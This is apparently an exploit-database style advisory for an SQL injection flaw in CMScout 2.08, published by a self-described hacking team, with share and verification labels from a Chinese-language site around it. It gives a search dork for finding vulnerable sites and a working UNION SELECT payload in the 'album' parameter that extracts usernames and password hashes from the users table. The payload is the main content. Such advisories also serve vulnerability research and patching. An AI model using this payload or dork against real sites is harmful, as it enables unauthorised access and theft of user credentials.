扫码分享
验证:
体验盒子# Title: CMScout 2.08 SQL Injection Vulnerability
# EDB-ID:
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr.0rYX and Cr3w-DZ
# Published:
# Verified:
# Download Exploit Code
# Download N/A
NNNNNNNNAAAAAASSSSSSSSTTTTTTTTTTTT
NNNNNNNNNNAAAAAASSSSSSSSSSSSTTTTTTTTTTTT
NNNNNNNNNNAAAAAAAASSSSTTTTeeeeeeaaaaaammmmmmmmmm
NNNNNNNNNNNNAAAAAAAASSSSSSSSSSTTTTeeeeeeeeaaaaaaaammmmmmmmmmmmmmmm
NNNNNNNNNNNNAAAAAAAASSSSSSSSTTTTeeeeeeeeeeaaaaaammmmmmmmmmmm
NNNNNNNNNNAAAAAAAAAAAAAASSSSTTTTeeeeaaaaaaaammmmmmmmmmmm
NNNNNNNNNNAAAAAAAAAAAAAASSSSSSSSSSSSTTTTeeeeeeeeeeaaaaaaaammmmmmmmmmmm
NNNNNNNNAAAAAAAASSSSSSSSTTTTeeeeeeaaaaaaaaaammmmmmmmmmmm
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] Title :CMScout 2.08 SQL Injection Vulnerability
[!] Author: Dr.0rYX and Cr3w-DZ
[!] MAIL: vx3@hotmail.de&Cr3w@hotmail.de
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.cmscout.za.net/
[+] script : CMScout 2.08
[+] Download : http://www.cmscout.co.za/index.php?page=downloads&menuid=9
[+] Vulnerability : php SQL injection
[+] Dork :Powered by CMScout (c)2005 CMScout Group
**************************************************************************/
[ Vulnerable File ]
http://server/index.php?page=photos&album=[N.A.S.T ]
[ Exploit ]
http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--
[ Example]
http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
[Greets ]
[+] :CLAW , exploit-db.com,all my friends....
体验盒子
